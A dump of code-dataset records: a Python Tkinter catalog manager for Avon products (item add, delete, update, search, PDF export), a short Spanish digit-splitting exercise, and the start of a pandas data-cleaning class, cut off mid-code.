existing_ids:\n new_id = random.randint(1000, 9999)\n\n return new_id\n\n\ndef delete():\n global frame_screen\n reset_frame() # Reset the frame before creating new widgets\n if not catalog_file_exists():\n messagebox.showerror(\"Error\", \"Catalog file does not exist. Please add some item first.\")\n return\n # Check if there is data in the file\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n first_line = file.readline()\n if not first_line.strip():\n # File is empty, show a message and return\n messagebox.showinfo(\"Info\", \"Catalog file is empty. Please add some items.\")\n return\n except FileNotFoundError:\n messagebox.showerror(\"Error\", \"Catalog data file not found.\")\n return\n except Exception as e:\n messagebox.showerror(\"Error\", f\"An error occurred: {str(e)}\")\n return\n # Create UI for deleting an item\n entry_font = font.Font(size=20) # Set the desired font size\n\n delete_label = Label(frame_screen, text=\"Delete Item\", font=(\"Helvetica\", 24))\n delete_label.place(x=100, y=30)\n\n item_id_label = Label(frame_screen, text=\"Enter Item ID to delete:\")\n item_id_label.place(x=100, y=90)\n\n item_id_entry = ttk.Entry(frame_screen, width=40, font=entry_font)\n item_id_entry.place(x=100, y=120, height=58)\n\n delete_button = ttk.Button(frame_screen, text=\"Delete\", command=lambda: delete_item(item_id_entry.get()))\n delete_button.place(x=100, y=188, height=30)\n\n # Close button\n close_button = ttk.Button(frame_screen, text=\"Close\", command=reset_frame)\n close_button.place(x=100, y=228, height=30)\n\n\ndef delete_item(item_id_str):\n if item_id_str is None:\n return # Return to the main menu\n\n if not item_id_str.isdigit():\n messagebox.showerror(\"Error\", \"Please enter a valid number for the Item ID.\")\n return\n\n item_id = int(item_id_str)\n\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n lines = file.readlines()\n except FileNotFoundError:\n lines = []\n\n found = False\n updated_data = []\n for line in lines:\n if line.startswith(str(item_id)):\n found = True\n else:\n updated_data.append(line)\n\n if found:\n with open(\"catalog_data.txt\", \"w\") as file:\n file.writelines(updated_data)\n\n messagebox.showinfo(\"Success\", f\"Item with Item ID {item_id} deleted successfully!\")\n else:\n messagebox.showerror(\"Error\", f\"No corresponding item found for Item ID: {item_id}\")\n\n\ndef update_item():\n global frame_screen\n\n reset_frame() # Reset the frame before creating new widgets\n if not catalog_file_exists():\n messagebox.showerror(\"Error\", \"Catalog file does not exist. Please add some item first\")\n return\n # Check if there is data in the file\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n first_line = file.readline()\n if not first_line.strip():\n # File is empty, show a message and return\n messagebox.showinfo(\"Info\", \"Catalog file is empty. Please add some items.\")\n return\n except FileNotFoundError:\n messagebox.showerror(\"Error\", \"Catalog data file not found.\")\n return\n except Exception as e:\n messagebox.showerror(\"Error\", f\"An error occurred: {str(e)}\")\n return\n entry_font = font.Font(size=20) # Set the desired font size\n\n update_label = Label(frame_screen, text=\"Update Item\", font=(\"Helvetica\", 24))\n update_label.place(x=100, y=30)\n\n item_id_label = Label(frame_screen, text=\"Enter Item ID to update:\")\n item_id_label.place(x=100, y=90)\n\n item_id_entry = ttk.Entry(frame_screen, width=40, font=entry_font)\n item_id_entry.place(x=100, y=120, height=58)\n\n update_button = ttk.Button(frame_screen, text=\"Update\", command=lambda: update_item_ui(item_id_entry.get()))\n update_button.place(x=100, y=188, height=30)\n\n # Close button\n close_button = ttk.Button(frame_screen, text=\"Close\", command=reset_frame)\n close_button.place(x=100, y=228, height=30)\n\n\ndef update_item_ui(item_id_str):\n global frame_screen\n if not item_id_str.isdigit():\n messagebox.showerror(\"Error\", \"Please enter a valid number for the Item ID.\")\n return\n\n item_id = int(item_id_str)\n\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n lines = file.readlines()\n except FileNotFoundError:\n lines = []\n\n found = False\n item_data = []\n for line in lines:\n if line.startswith(str(item_id)):\n found = True\n item_data = line.strip().split(\"|\")[1:6] # Extract name, price, description, category\n break\n\n if found:\n create_update_frame(item_id, item_data)\n else:\n messagebox.showerror(\"Error\", f\"No corresponding item found for Item ID: {item_id}\")\n\n\ndef create_update_frame(item_id, item_data):\n global frame_screen, image_path_entry, image_preview_label\n\n frame_screen.destroy() # Destroy the existing frame\n frame_screen = Frame(root, width=920, height=536, borderwidth=10, relief=\"flat\")\n frame_screen.place(x=360, y=184)\n entry_font = font.Font(size=20) # Set the desired font size\n\n name_label = Label(frame_screen, text=\"Name:\")\n name_label.place(x=100, y=30)\n name_entry = ttk.Entry(frame_screen, width=40, font=entry_font)\n name_entry.insert(0, item_data[0]) # Pre-fill with existing name\n name_entry.place(x=100, y=60, height=58)\n\n price_label = Label(frame_screen, text=\"Price:\")\n price_label.place(x=100, y=130)\n price_entry = ttk.Entry(frame_screen, width=40, font=entry_font, validate=\"key\",\n validatecommand=(frame_screen.register(validate_float), '%P'))\n price_entry.insert(0, item_data[1]) # Pre-fill with existing price\n price_entry.place(x=100, y=158, height=58)\n\n description_label = Label(frame_screen, text=\"Description:\")\n description_label.place(x=100, y=226)\n description_entry = ttk.Entry(frame_screen, width=40, font=entry_font)\n description_entry.insert(0, item_data[2]) # Pre-fill with existing description\n description_entry.place(x=100, y=254, height=58)\n\n category_label = Label(frame_screen, text=\"Category:\")\n category_label.place(x=100, y=322)\n categories = [\n \"Makeup\",\n \"Fragrance\",\n \"Skincare\",\n \"Bath and Body\",\n \"Intimate Apparel\",\n \"Accessories\",\n \"Jewelry\",\n \"Men's Store\",\n \"Home & Kitchen\",\n \"Nutrition\",\n \"Other\"\n ]\n category_var = StringVar()\n category_var.set(item_data[3].strip()) # Pre-select existing category\n\n category_dropdown = OptionMenu(frame_screen, category_var, *categories)\n category_dropdown.place(x=100, y=350, height=30, width=150)\n\n # Image Preview Label\n image_preview_label = Label(frame_screen, text=\"Image Preview:\")\n image_preview_label.place(x=260, y=322)\n\n # Entry for image path\n image_path_entry = ttk.Entry(frame_screen, width=40, font=entry_font)\n image_path_entry.insert(0, item_data[4] if len(item_data) > 4 else \"\") # Pre-fill with existing image path\n\n # Load and display the image preview\n update_image_preview1(item_data[4] if len(item_data) > 4 else \"\") # Initial image preview\n\n\n\n # Button for updating the image\n update_image_button = ttk.Button(frame_screen, text=\"Update Image\", command=update_image_path_button)\n update_image_button.place(x=100, y=400, height=30)\n\n # Save button\n save_button = ttk.Button(frame_screen, text=\"Save\",\n command=lambda: save_updated_item(item_id, name_entry.get(), price_entry.get(),\n description_entry.get(), category_var.get(),\n image_path_entry))\n save_button.place(x=100, y=440, height=30, width=83)\n # Close button\n close_button = ttk.Button(frame_screen, text=\"Close\", command=reset_frame)\n close_button.place(x=100, y=480, height=30, width=83)\n\n\ndef update_image_preview1(image_path):\n global frame_screen, image_preview_label\n\n # Destroy the existing image preview label\n if hasattr(image_preview_label, 'image_preview'):\n image_preview_label.image_preview.destroy()\n\n # Image Preview Label\n image_preview_label = Label(frame_screen, text=\"Image Preview:\")\n image_preview_label.place(x=260, y=322)\n\n # Load and display the new image preview\n img = Image.open(image_path)\n img.thumbnail((150, 150), Image.BICUBIC)\n preview_photo = ImageTk.PhotoImage(img)\n image_preview = Label(frame_screen, image=preview_photo)\n image_preview.photo = preview_photo\n image_preview.place(x=280, y=360,height=126, width=137)\n image_preview_label.image_preview = image_preview\n\n\ndef update_image_path_button():\n global image_path_entry\n\n # Use a file dialog to get the new image path from the user\n new_image_path = filedialog.askopenfilename(title=\"Select Image File\",\n filetypes=[(\"Image Files\", \"*.png;*.jpg;*.jpeg;*.gif\")])\n\n # Update the entry widget with the selected image path\n image_path_entry.delete(0, tk.END)\n image_path_entry.insert(0, new_image_path)\n\n update_image_preview1(new_image_path)\n\n\ndef update_image_path(item_id, new_image_path):\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n lines = file.readlines()\n except FileNotFoundError:\n lines = []\n\n updated_data = []\n for line in lines:\n if line.startswith(str(item_id)):\n # Update the image path\n updated_line = f\"{line.strip()}, {new_image_path}\\n\"\n updated_data.append(updated_line)\n else:\n updated_data.append(line)\n\n with open(\"catalog_data.txt\", \"w\") as file:\n file.writelines(updated_data)\n\n\ndef save_updated_item(item_id, new_name, new_price, new_description, new_category, image_path_entry):\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n lines = file.readlines()\n except FileNotFoundError:\n lines = []\n\n # Check for empty fields, non-numeric price, category not selected\n try:\n new_price = float(new_price)\n except ValueError:\n messagebox.showerror(\"Error\", \"Please enter a valid numeric value for the price.\")\n return\n\n if not new_price or not isinstance(new_price, (int, float)):\n messagebox.showerror(\"Error\", \"Please enter a valid numeric value for the price.\")\n return\n\n # Check if any of the fields contain only spaces\n if not (new_name.strip() and new_description.strip() and new_category.strip()):\n messagebox.showerror(\"Error\", \"Please fill in all fields correctly.\")\n return\n\n # Check if the item name already exists in the catalog, excluding the current item being updated\n if is_duplicate_name(new_name) and new_name != get_item_name_by_id(item_id):\n messagebox.showerror(\"Error\", \"Item name already exists in the catalog. Please choose a different name.\")\n return\n\n # Replace \"|\" with \"\\\" in item_name and item_description\n item_name_cleaned = new_name.replace(\"|\", \"\\\\\")\n item_description_cleaned = new_description.replace(\"\\n\", \" \").replace(\"|\", \"\\\\\")\n\n updated_data = []\n for line in lines:\n if line.startswith(str(item_id)):\n # Extract the existing image path\n existing_image_path = line.strip().split(\"|\")[5]\n\n # Check if the data is the same as existing data\n if (\n new_name == line.strip().split(\"|\")[1] and\n new_price == float(line.strip().split(\"|\")[2]) and\n new_description == line.strip().split(\"|\")[3] and\n new_category == line.strip().split(\"|\")[4] and\n image_path_entry.get() == existing_image_path\n ):\n messagebox.showinfo(\"Info\", \"No changes detected. Item not updated.\")\n reset_frame() # Close the update frame\n return\n\n # Update the name, price, category, and description if provided\n updated_line = (\n f\"{item_id}|{item_name_cleaned}|{new_price}|{item_description_cleaned}|{new_category}|{image_path_entry.get()}\\n\"\n )\n updated_data.append(updated_line)\n else:\n updated_data.append(line)\n\n with open(\"catalog_data.txt\", \"w\") as file:\n file.writelines(updated_data)\n\n messagebox.showinfo(\"Success\", f\"Item with Item ID {item_id} updated successfully!\")\n reset_frame() # Close the update frame\n\n\ndef get_item_name_by_id(item_id):\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n for line in file:\n data = line.strip().split(\"|\")\n if data[0] == str(item_id):\n return data[1]\n except FileNotFoundError:\n return None\n\n\ndef display_table():\n global table, category_var # Declare category_var as global\n # Reset the frame before creating new widgets\n reset_frame()\n if not catalog_file_exists():\n messagebox.showerror(\"Error\", \"Catalog file does not exist. Please add some item first\")\n return\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n first_line = file.readline()\n if not first_line.strip():\n # File is empty, show a message and return\n messagebox.showinfo(\"Info\", \"Catalog file is empty. Please add some items.\")\n return\n except FileNotFoundError:\n messagebox.showerror(\"Error\", \"Catalog data file not found.\")\n return\n\n generate_pdf_image = PhotoImage(file='pdfbutton.png')\n generate_pdf_button = Button(frame_screen, text=\"Generate PDF\", image=generate_pdf_image, bg='#F52D2D',\n borderwidth=0,\n command=generate_pdf_from_table)\n generate_pdf_button.image = generate_pdf_image\n generate_pdf_button.place(x=855, y=0, anchor='nw')\n\n # Create search entry, category dropdown, and button\n search_label = ttk.Label(frame_screen, text=\"Search by Name:\")\n search_label.place(x=10, y=10)\n\n search_entry = ttk.Entry(frame_screen, width=20)\n search_entry.place(x=120, y=10)\n\n # Category dropdown using Menubutton\n category_label = Label(frame_screen, text=\"Category:\")\n category_label.place(x=350, y=10)\n\n categories = [\n \"All\",\n \"Makeup\",\n \"Fragrance\",\n \"Skincare\",\n \"Bath and Body\",\n \"Intimate Apparel\",\n \"Accessories\",\n \"Jewelry\",\n \"Men's Store\",\n \"Home & Kitchen\",\n \"Nutrition\",\n \"Other\"\n ]\n\n category_var = StringVar()\n category_var.set(categories[0]) # Set default category\n\n category_menu = Menubutton(frame_screen, textvariable=category_var, indicatoron=True, borderwidth=1,\n relief=\"raised\", width=13)\n category_menu.place(x=420, y=10, height=20)\n\n category_menu.menu = Menu(category_menu, tearoff=False)\n category_menu[\"menu\"] = category_menu.menu\n\n for category in categories:\n category_menu.menu.add_radiobutton(label=category, variable=category_var, value=category)\n\n search_button = ttk.Button(frame_screen, text=\"Search\",\n command=lambda: search_and_display_table(search_entry.get(), category_var.get()))\n search_button.place(x=550, y=7)\n\n # Create Treeview widget\n table = ttk.Treeview(frame_screen, columns=('ID', 'Name', 'Price', 'Description', 'Category'), show='headings')\n table.place(x=0, y=40, width=890, height=430)\n\n # Set column headings\n table.heading('ID', text='ID')\n table.heading('Name', text='Name')\n table.heading('Price', text='Price')\n table.heading('Description', text='Description')\n table.heading('Category', text='Category')\n\n # Set column widths\n column_widths = {'ID': 50, 'Name': 150, 'Price': 100, 'Description': 100, 'Category': 100}\n for column, width in column_widths.items():\n table.column(column, width=width)\n\n # Set font size for the entire table\n font_size = 12 # Adjust the font size as needed\n font_style = font.Font(size=font_size)\n table.tag_configure('myfont', font=font_style)\n\n # Add a vertical scrollbar\n scrollbar = ttk.Scrollbar(frame_screen, orient='vertical', command=table.yview)\n scrollbar.place(x=870, y=50, height=410)\n table.configure(yscrollcommand=scrollbar.set)\n\n # Event handler for resetting column widths\n def reset_column_widths(event):\n for column, width in column_widths.items():\n table.column(column, width=width)\n\n # Bind the callback function to the cell click event\n def on_cell_click(event):\n if not table.selection():\n # No item is selected, do nothing\n return\n\n item = table.selection()[0]\n item_data = table.item(item, 'values')\n full_description = item_data[3] if item_data else \"\" # Assuming description is at index 3\n\n # Deselect the currently selected item\n table.selection_remove(item)\n\n # Display full description in a pop-up window\n simpledialog.messagebox.showinfo(\"Full Description\", full_description)\n\n table.bind('', on_cell_click)\n\n # Bind the event handler to the column header\n for column in column_widths.keys():\n table.heading(column, text=column, command=lambda c=column: reset_column_widths(c))\n table.heading(column, anchor=\"w\")\n\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n for line in file:\n data = line.strip().split(\"|\")\n table.insert('', index=0, values=(data[0], data[1], data[2], data[3], data[4]), tags='myfont')\n except FileNotFoundError:\n messagebox.showerror(\"Error\", \"Catalog data file not found.\")\n\n # Store the table globally\n table = table\n # Other widgets (close button)\n close_button = ttk.Button(frame_screen, text=\"Close\", command=reset_frame)\n close_button.place(x=100, y=480, height=30)\n\n\ndef search_and_display_table(search_term, selected_category):\n global table # Access the global table variable\n table.delete(*table.get_children()) # Clear the existing table in the table\n\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n for line in file:\n data = line.strip().split(\"|\")\n if (selected_category == \"All\" or data[4] == selected_category) and search_term.lower() in data[1].lower():\n table.insert('', index=0, values=(data[0], data[1], data[2], data[3], data[4]), tags='myfont')\n except FileNotFoundError:\n messagebox.showerror(\"Error\", \"Catalog data file not found.\")\n\n\nclass PDFWithFooter(FPDF):\n def footer(self):\n self.set_y(-15)\n self.set_font(\"Arial\", size=10)\n self.cell(0, 10, f\"Page {self.page_no()}\", 0, 0, 'C')\n\n\ndef truncate_text(text, max_length):\n return (text[:max_length] + '...') if len(text) > max_length else text\n\n\ndef generate_pdf_from_table():\n global table # Access the global table variable\n\n # Check if the table is empty\n if not table.get_children():\n messagebox.showerror(\"Error\", \"Table is empty. Please add items before generating a PDF.\")\n return\n\n # Prompt the user for a PDF file name\n pdf_file_name = simpledialog.askstring(\"PDF File Name\", \"Enter a name for the PDF file:\")\n\n # Check if the user provided a name\n if pdf_file_name is None or pdf_file_name.strip() == \"\":\n messagebox.showerror(\"Error\", \"Invalid PDF file name. Please provide a valid name.\")\n return\n\n # Construct the PDF file path\n pdf_file_path = f\"{pdf_file_name.strip()}.pdf\"\n\n # Check if the file already exists\n if os.path.exists(pdf_file_path):\n # Ask the user if they want to overwrite the existing file\n response = messagebox.askyesno(\"File Exists\",\n f\"A file named '{pdf_file_name}' already exists. Do you want to overwrite it?\")\n\n if not response:\n return # User chose not to overwrite, do nothing\n\n # Get the table data\n data = []\n for item_id in table.get_children():\n item_data = table.item(item_id)['values']\n truncated_data = [truncate_text(str(col), 30) for col in item_data] # Adjust max_length as needed\n data.append(truncated_data)\n\n # Create a PDF document with footer\n pdf = PDFWithFooter()\n\n # Add the first page\n pdf.add_page()\n\n # Add Avon logo to the top of the PDF\n avon_logo = \"avon_logo.png\" # Adjust the path accordingly\n pdf.image(avon_logo, x=10, y=8, w=30)\n\n # Set font for the title\n pdf.set_font(\"Arial\", 'B', 16)\n pdf.ln(10) # Move down to leave space between logo and title\n pdf.cell(0, 10, 'Avon Catalog', ln=True, align='C')\n\n # Move down to leave space for the table\n pdf.ln(20)\n\n # Set font for the table content\n pdf.set_font(\"Arial\", size=12)\n pdf.set_font(\"Arial\", size=12)\n\n # Set background color for header row\n pdf.set_fill_color(228, 4, 75)\n\n # Define the column widths\n col_widths = [30, 40, 40, 40, 40]\n\n # Add column headings to PDF\n for i, col in enumerate(table[\"columns\"]):\n pdf.cell(col_widths[i], 10, str(col), border=1, fill=True, ln=False)\n\n pdf.ln()\n\n # Set background colors for data rows\n pdf.set_fill_color(255, 255, 255)\n for row in data:\n for i, col in enumerate(row):\n pdf.cell(col_widths[i], 10, truncate_text(str(col), 15), border=1, fill=True,\n ln=False) # Adjust max_length as needed\n pdf.ln(10) # Leave space between rows\n\n # Check if there's enough space for another row, if not, add a new page\n if pdf.get_y() + 20 > pdf.h - 15:\n pdf.add_page()\n\n try:\n # Attempt to save the PDF file\n pdf.output(pdf_file_path)\n messagebox.showinfo(\"Success\", f\"PDF '{pdf_file_name}' generated successfully.\")\n except PermissionError:\n # Handle the case where the file is in use with a dialog box\n error_message = (\n f\"The file '{pdf_file_path}' is currently open. \"\n f\"Please close it before generating a new PDF.\"\n )\n messagebox.showerror(\"Permission Error\", error_message)\n\n\ndef load_from_file():\n global item_list\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n for line in file:\n values = line.strip().split(\"|\")\n if len(values) >= 6: # Ensure there are at least 6 elements in the list\n # Assuming the format is: ID, Name, Price, Description, Category, ImagePath\n item = {\n 'id': values[0],\n 'name': values[1],\n 'price': float(values[2]), # Convert 'price' to float\n 'description': values[3],\n 'category': values[4],\n 'image_path': values[5].strip() # Remove leading/trailing spaces from the file path\n }\n item_list.append(item) # Append the item to user_list\n else:\n print(f\"Skipping invalid line: {line}\")\n\n # Update the user interface with the loaded catalog data\n\n except FileNotFoundError:\n pass\n\n\ndef create_item_boxes():\n global canvas, canvas_frame # Declare canvas and canvas_frame as global\n\n # Clear existing item boxes\n for widget in canvas_frame.winfo_children():\n widget.destroy()\n\n # Create a dictionary to store items by category\n items_by_category = {}\n\n for item in item_list:\n category = item['category']\n if category not in items_by_category:\n items_by_category[category] = []\n items_by_category[category].append(item)\n\n # Create a frame with a custom border color\n box_frame = tk.Frame(canvas_frame, relief=\"solid\", highlightbackground=\"#E4044B\")\n box_frame.grid(row=0, column=0, padx=5, pady=5)\n\n # Iterate through each category and display items\n for category, items in items_by_category.items():\n # Add category title row\n title_row = tk.Frame(box_frame, bd=0, relief=\"flat\", bg=\"#E4044B\")\n title_row.pack(side=tk.TOP, fill=tk.X, padx=5, pady=5)\n category_title = ttk.Label(title_row, text=category, font=(\"Arial\", 14, \"bold\"), foreground=\"white\",\n background=\"#E4044B\")\n category_title.pack(side=tk.LEFT, padx=5, pady=5)\n\n # Add items in a 3 by 3 grid\n items_frame = tk.Frame(box_frame, bd=0, relief=\"flat\", bg=\"white\")\n items_frame.pack(side=tk.TOP, fill=tk.BOTH, padx=5, pady=5)\n\n for i, item in enumerate(items):\n img = Image.open(item['image_path'])\n img.thumbnail((254, 254), Image.BICUBIC) # Resize to 254 by 254 pixels\n photo = ImageTk.PhotoImage(img)\n\n # Change the border color here\n item_frame = tk.Frame(items_frame, bd=1, relief=\"solid\", highlightbackground=\"#e7004c\")\n item_frame.grid(row=i // 3, column=i % 3, padx=5, pady=5)\n\n item_box = tk.Label(item_frame, text=item['name'], image=photo, compound=tk.TOP)\n item_box.photo = photo\n font_size = 14\n item_box['font'] = font.Font(size=font_size)\n item_box.pack()\n\n # Bind the click event to show_item_info function\n item_box.bind(\"\", lambda event, u=item: show_item_info(u))\n\n # Configure grid weights for resizing\n box_frame.grid_columnconfigure(0, weight=1)\n box_frame.grid_rowconfigure(1, weight=1)\n\n # Update the scroll region to include the new item boxes\n canvas.configure(scrollregion=canvas.bbox(\"all\"))\n\n # Bind mouse wheel event for vertical scrolling\n canvas.bind(\"\", lambda event: canvas.yview_scroll(int(-1 * (event.delta / 120)), \"units\"))\n\n # Bind the event to update the scroll region when the canvas_frame size changes\n canvas_frame.bind(\"\", lambda event: canvas.configure(scrollregion=canvas.bbox(\"all\")))\n\n\ndef display_items():\n global canvas, item_list, canvas_frame\n\n # Reset the canvas and frame\n reset_frame()\n\n # Create a Canvas widget with a vertical scrollbar\n canvas = tk.Canvas(frame_screen, width=884, height=539, bd=2)\n canvas.place(x=0, y=0)\n canvas.grid(row=2, column=0, columnspan=4, sticky='nsew')\n\n # Scroll Bar\n scrollbar = tk.Scrollbar(frame_screen, command=canvas.yview)\n scrollbar.grid(row=2, column=4, sticky='ns')\n canvas.configure(yscrollcommand=scrollbar.set)\n\n # Canvas\n canvas_frame = tk.Frame(canvas)\n canvas.create_window((0, 0), window=canvas_frame, anchor=tk.NW)\n\n # List to store item data\n item_list = []\n\n # Load existing item data from file\n load_from_file()\n\n # Sort items\n item_list.sort(key=lambda x: x['name'].lower())\n\n # Display existing item data\n create_item_boxes()\n if not item_list:\n # Return a message if there are no items in the catalog\n messagebox.showinfo(\"No Items\", \"Catalog file is empty. Please add some items.\")\n return\n # Configure grid weights for resizing\n for i in range(4):\n root.grid_columnconfigure(i, weight=1)\n root.grid_rowconfigure(2, weight=1)\n canvas.configure(scrollregion=(0, 0, 500, 500)) # Adjust these values as needed\n\n # Bind the event to update the scroll region when the canvas_frame size changes\n canvas_frame.bind(\"\", lambda event: canvas.configure(scrollregion=canvas.bbox(\"all\")))\n\n # Other widgets (close button)\n close_image = PhotoImage(file=\"close_button.png\")\n close_button = ttk.Button(frame_screen, text=\"Close\", image=close_image, command=reset_frame)\n close_button.image = close_image # Ensure the image is not garbage collected\n close_button.place(x=845, y=0, height=50, width=50)\n\n\ndef close_current_info_window():\n global current_info_window\n if current_info_window:\n current_info_window.destroy()\n current_info_window = None\n\ndef show_item_info(item):\n global current_info_window\n\n close_current_info_window() # Close the previous window if it exists\n\n info_window = tk.Toplevel(root)\n info_window.title(\"Item Information\")\n info_window.resizable(False, False)\n\n # Load the image and create a resized thumbnail\n img = Image.open(item['image_path'])\n img.thumbnail((254, 254), Image.BICUBIC)\n photo = ImageTk.PhotoImage(img)\n\n # Create a label with the item's name and thumbnail image\n item_frame = tk.Frame(info_window)\n item_frame.pack(padx=10, pady=10)\n\n item_box = ttk.Label(item_frame, text=item['name'], image=photo, compound=tk.TOP, font=(\"Arial\", 14))\n item_box.photo = photo\n item_box.pack()\n\n # Create a frame for the price display\n price_frame = tk.Frame(info_window, bg=\"#e7004c\", padx=10, pady=5, relief=\"solid\", borderwidth=1, bd=1)\n price_frame.pack(pady=5)\n\n # Display the rounded price\n price_label = ttk.Label(price_frame, text=f\"Price: ₱{item['price']:.2f}\", font=(\"Arial\", 12),\n foreground=\"white\", background=\"#e7004c\")\n price_label.pack()\n\n # Create a scrolled text widget for the description\n description_frame = tk.Frame(info_window, padx=10, pady=5)\n description_frame.pack()\n\n description_text = tk.Text(description_frame, wrap=\"word\", height=5, width=40)\n description_text.insert(tk.END, item['description'])\n description_text.config(state=tk.DISABLED)\n description_text.pack(side=tk.LEFT, fill=tk.Y)\n\n # Create a vertical scrollbar for the description\n description_scrollbar = ttk.Scrollbar(description_frame, orient=\"vertical\", command=description_text.yview)\n description_scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\n description_text[\"yscrollcommand\"] = description_scrollbar.set\n\n # Display additional information using a Text widget\n additional_info_text = tk.Text(info_window, wrap=\"word\", height=2, width=40)\n additional_info_text.insert(tk.END, f\"Category: {item['category']}\\nID: {item['id']}\")\n additional_info_text.config(state=tk.DISABLED)\n additional_info_text.pack(pady=10)\n\n # Center the window on the screen\n info_window.update_idletasks()\n width = info_window.winfo_width()\n height = info_window.winfo_height()\n x = (info_window.winfo_screenwidth() - width) // 2\n y = (info_window.winfo_screenheight() - height) // 2\n info_window.geometry(f\"{width}x{height}+{x}+{y}\")\n\n # Update the current information window\n current_info_window = info_window\nroot = Tk()\nroot.geometry('1280x720')\nroot.resizable(False, False)\nroot.title('Avon Catalog Management System')\n# Logo\nlogo_image = PhotoImage(file='avon_logo.png')\nroot.iconphoto(True, logo_image)\n\n#Main Ui Interface\nframePhoto = PhotoImage(file='Frame 1.png')\nframe_photo_label = Label(root, border=0, image=framePhoto)\nframe_photo_label.pack(fill=BOTH, expand=True)\n\n#Slogan Image\nslogan_frame = PhotoImage(file='slogan.png')\nslogan_frame_label = Label(root, image=slogan_frame, border=0, bg='#E4044B')\nslogan_frame_label.place(x=0, y=140)\n\n# Frame\nframe_screen = Frame(root, width=920, height=536, borderwidth=10, relief=\"flat\")\nframe_screen.place(x=360, y=184)\n\nadd_item_image = PhotoImage(file='add_button.png')\nadd_button = Button(root, text=\"Add Item\", image=add_item_image, bg='#FFFFFF', borderwidth=0,\n command=add_item)\nadd_button.image = add_item_image\nadd_button.place(x=19, y=194, anchor='nw')\n\ndisplay_table_image = PhotoImage(file='display_table_button.png')\ndisplay_table_button = Button(root, text=\"Display table\", image=display_table_image, bg='#FFFFFF', borderwidth=0,\n command=display_table)\ndisplay_table_button.image = display_table_image\ndisplay_table_button.place(x=19, y=295, anchor='nw')\n\ndisplay_items_image = PhotoImage(file='display_items_button.png')\ndisplay_button = Button(root, text=\"Delete Item\", image=display_items_image, bg='#FFFFFF', borderwidth=0,\n command=display_items)\ndisplay_button.image = display_items_image\ndisplay_button.place(x=19, y=396, anchor='nw')\n\ndelete_item_image = PhotoImage(file='delete_button.png')\ndelete_button = Button(root, text=\"Delete Item\", image=delete_item_image, bg='#FFFFFF', borderwidth=0,\n command=delete)\ndelete_button.image = delete_item_image\ndelete_button.place(x=19, y=497, anchor='nw')\n\nupdate_item_image = PhotoImage(file='update_button.png')\nupdate_button = Button(root, text=\"Update Item\", image=update_item_image, bg='#FFFFFF', borderwidth=0,\n command=update_item)\nupdate_button.image = update_item_image\nupdate_button.place(x=19, y=598, anchor='nw')\nroot.mainloop()\n","repo_name":"alettuce17/Group5System","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":40534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21693448792","text":"print('ejercicio 3')\n\n#números de 5 dígitos, en un vector, hasta que uno de ellos sea negativo.\nnum = str(input('ingresar numero de cinco digitos: '))\n\ndef validar_digitos(numero):\n esvalido = True\n if (len(numero) > 5) or ('-' in num):\n esvalido = False\n return esvalido\n\nprint(num)\nprint(validar_digitos(num))\n\n#descomponer los números\n\n\n# agrupando los dígitos pares en un vector y los impares\nlista_par = []\nlista_impar = []\n\ndef agrupar(numeros):\n for i in numeros:\n numerito = int(i)\n if (numerito % 2 == 0):\n lista_par.append(numerito)\n else:\n lista_impar.append(numerito)\n\nagrupar(num)\nprint('los numeros pares ingresados son: ')\nprint(lista_par)\nprint('los numeros impares ingresados son: ')\nprint(lista_impar)\n\n#se deben mostrar los resultados de las sumas de los números de estos últimos \n# vectores por posiciones contiguas (el 1ro de los pares con el 1ro de los impares, y así sucesivamente).\n\nlista_resultado = []\n\nif (len(lista_par) > len(lista_impar)):\n dif = len(lista_par) - len(lista_impar)\n for i in range(dif):\n lista_impar.append(0)\n\n\n for x in range(len(lista_par)):\n suma = lista_par[x] + lista_impar[x]\n lista_resultado.append(suma)\nelse: \n dif = len(lista_impar) - len(lista_par)\n for i in range(dif):\n lista_par.append(0)\n\n\n for x in range(len(lista_impar)):\n suma = lista_impar[x] + lista_par[x]\n lista_resultado.append(suma)\n\nprint('el resultado de la suma de los pares con impares es: ')\nprint(lista_resultado) \n\n","repo_name":"Maxi-rpc/python_practice","sub_path":"Guada/23-05-13 guia n3/ej3.py","file_name":"ej3.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28124251730","text":"import pandas as pd\nimport numpy as np\nimport re\nimport sys\nimport datetime\nfrom uploading_command import UploadingCommand\nsys.path.append(\"../temhelp\")\nfrom true_tem_handler import TrueTemplateHandler\n\nclass DataAggregator(UploadingCommand):\n\n def __init__(self, template_name):\n '''\n (DataAggregator, str) -> None\n\n Initializes a data aggregator, and injects a specific template\n name to the uploading command\n '''\n UploadingCommand.__init__(self, template_name)\n self._postal_code = 'Postal Code'\n self._processing_detail = 'Processing Detail'\n \n\n def execute(self, df, th):\n '''\n (DataAggregator, DataFrame, TemplateHandler) -> DataFrame\n\n Executes the command, assuming a dataframe object gets passed in.\n Currently only checks for if the data matches the type the column is\n suppose to be.\n '''\n template = th\n self._exec_status = False\n copy_df = df\n # get a list of fields that are not formatted correctly\n wrong_format_fields = parse_all_columns(df, template)\n # Check for postal code column\n if (df.get(self._postal_code) is not None):\n new_postal = self._postal_code_checker(df[self._postal_code])\n copy_df = copy_df.update(new_postal)\n # Change Processing detail column to the entry date\n if (df.get(self._processing_detail) is not None):\n new_proc = self._processing_details(df[self._processing_detail])\n df = df.update(new_proc)\n \n self._exec_status = True \n return df\n \n def _processing_details(self, df):\n '''\n (DataFrame) -> DataFrame\n \n Takes in the 'Processing Detail' column and replace each element\n with the current date.\n '''\n new_col = list()\n now = datetime.datetime.now()\n # Format: YYYY/MM/DD\n now = str(now.year) +'/' + str(now.month) + '/' + str(now.day)\n for item in range (len(df.get_values())):\n new_col.append(now)\n \n return pd.DataFrame(new_col, 